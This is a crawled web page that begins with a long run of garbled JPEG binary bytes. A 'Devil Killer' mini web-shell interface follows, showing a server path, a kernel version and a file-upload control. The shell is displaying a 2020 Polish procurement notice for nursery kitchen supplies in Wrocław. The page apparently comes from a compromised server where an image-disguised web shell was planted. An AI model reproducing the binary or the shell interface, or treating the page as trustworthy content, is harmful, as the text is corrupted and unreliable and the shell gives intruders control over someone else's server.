JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20200707/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20200707/558924-N-2020.html

 <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 558924-N-2020 z dnia 2020-07-07 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Wrocławski Zespół Żłobków</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Dostawę wyposażenia pionu żywienia z podziałem na trzy zadania. ZADANIE 1 Dostawa drobnego sprzętu do wyposażenia kuchni ZADANIE 2 Dostawa garnków, pojemników GN ZADANIE 3 Dostawa kubków, misek, talerzy, łyżeczek Znak postępowania: ZP-67/WZŻ/2020.</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Tak</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu">Przedmiot zamówienia jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Rozwoju Regionalnego – Regionalny Program Operacyjny Województwa Dolnośląskiego na Projekt pt.: „Mamo, tato wróć do pracy” (nr wniosku RPDS.08.04.01-02-0129/19) realizowany przez Gminę Wrocław / Wrocławski Zespół Żłobków współfinansowany ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego 2014-2020 </span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Wrocławski Zespół Żłobków</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">02154505100000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Fabryczna</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">15</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">53-609</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Wrocław</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">dolnośląskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">4871 718 6246, </span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">przetargi@wzz.wroc.pl, </span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">-</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url"></span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">http://www.bip.wzz.wroc.pl)</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Ofertę wraz z wymaganymi oświadczeniami i dokumentami należy złożyć w zamkniętej kopercie oznaczonej danymi Wykonawcy w formie pisemnej</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Wrocławski Zespół Żłobków ul. Fabryczna 15 53-609 Wrocław Sekretariat</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Dostawę wyposażenia pionu żywienia z podziałem na trzy zadania. ZADANIE 1 Dostawa drobnego sprzętu do wyposażenia kuchni ZADANIE 2 Dostawa garnków, pojemników GN ZADANIE 3 Dostawa kubków, misek, talerzy, łyżeczek Znak postępowania: ZP-67/WZŻ/2020.</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">Znak postępowania: ZP-67/WZŻ/2020.</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiotem zamówienia jest Dostawa wyposażenia pionu żywienia z podziałem na trzy zadania. ZADANIE 1 Dostawa drobnego sprzętu do wyposażenia kuchniZADANIE 2 Dostawa garnków, pojemników GNZADANIE 3 Dostawa kubków, misek, talerzy, łyżeczek2.1.2.Dostawa – zadanie nr 1 2.1.2. Przedmiot zamówienia dostarczony będzie do:Żłobka nr 16 ul. Sygnałowa 23, Wrocław,2.1.3.Opis przedmiotu zamówienia wraz z ilościami zawiera Załącznik nr 2.1. do SIWZ - Formularz asortymentowo-cenowy.2.1.4. Zasady (warunki) realizacji przedmiotu zamówienia oraz płatności zawiera Załącznik nr 6 do SIWZ – Projekt umowy.2.2.Dostawa – zadanie nr 2 2.2.1. Przedmiot zamówienia dostarczony będzie do:Żłobka nr 16 ul. Sygnałowa 23, Wrocław,2.2.2.Opis przedmiotu zamówienia wraz z ilościami zawiera Załącznik nr 2.2. do SIWZ - Formularz asortymentowo-cenowy.2.2.3. Zasady (warunki) realizacji przedmiotu zamówienia oraz płatności zawiera Załącznik nr 6 do SIWZ – Projekt umowy.2.3.Dostawa – zadanie nr 3 2.3.1. Przedmiot zamówienia dostarczony będzie do:Żłobka nr 16 ul. Sygnałowa 23, Wrocław,2.3.2.Opis przedmiotu zamówienia wraz z ilościami zawiera Załącznik nr 2.3. do SIWZ - Formularz asortymentowo-cenowy.2.3.3. Zasady (warunki) realizacji przedmiotu zamówienia oraz płatności zawiera Załącznik nr 6 do SIWZ – Projekt umowy.2.4. Wszelkie użyte w opisie przedmiotu zamówienia nazwy, typy i pochodzenie nie są dla wykonawców wiążące, mają jedynie charakter pomocniczy. W wypadku użytych w opisie nazw Zamawiający dopuszcza stosowanie produktów „równoważnych”, gdzie produkt równoważny oznacza taki produkt, który ma takie same cechy, funkcje oraz parametry i standardy jakościowe lub lepsze niż konkretny produkt wskazany w opisie przedmiotu zamówienia. </span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">39220000-0</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39221000-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39221120-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39221210-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39221180-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39221130-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39223100-2</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2020-08-21</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">a) odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt. 1 ustawy – wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast w/w odpisu, składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy lub miejsce zamieszkania tej osoby. Dokumenty/oświadczenia powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem składania ofert</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu"></span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> 